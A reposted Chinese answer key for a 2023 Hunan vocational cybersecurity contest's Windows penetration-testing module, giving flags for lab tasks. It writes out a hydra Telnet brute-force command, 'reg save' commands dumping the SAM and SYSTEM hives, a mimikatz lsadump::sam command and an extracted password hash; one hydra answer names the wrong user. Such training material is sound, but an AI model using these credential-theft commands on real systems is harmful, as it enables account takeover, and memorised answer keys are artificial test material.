0


中职网络安全B模块Windows 操作系统渗透测试2023年湖南省

需要环境私

1.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中 Telnet 服务对应的端口号作为FLAG提交;

flag:23

2.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,使用kali中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做 FLAG 进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)

flag:hydra -l administrator -P /usr/share/wordlists/dirb/small.txt

3.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,使用kali中 hydra 对服务器 Telnet 服务进行暴力破解(用户名为teltest),将破解成功的密码当做 FLAG 进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)

flag:123

4.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中 sam 文件使用reg 相关命令提取,将完整命令作为 FLAG 提交;

靶机开启3389远程连接服务通过上面爆破出来的密码进行连接

flag: reg save HKLM\SAM sam.hive

5.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中 system 文件使用reg 相关命令提取,将完整命令作为 FLAG 提交;

flag:reg save HKLM\SYSTEM system.hive

6.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,将sam文件与 system 文件提取到本地,使用桌面 mimikatz 工具提取teltest密码信息,将提取信息的命令作为 FLAG 提交;

桌面有个mimikatz文件夹右键里面使用管理员权限打开

flag:lsadump::sam /sam:C:\sam.hive /system:C:\system.hive

7.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试,将sam文件与 system 文件提取到本地,使用桌面 mimikatz 工具提取administrators密码信息,将提取到的 hash 值作为 FLAG 提交;

flag:3dbde697d71690a769204beb12283678


本文转载自: https://blog.csdn.net/FRANXX_02/article/details/128098041
版权归原作者 Strelizia_XX 所有, 如有侵权,请联系我们删除。

“中职网络安全B模块Windows 操作系统渗透测试2023年湖南省”的评论:

还没有评论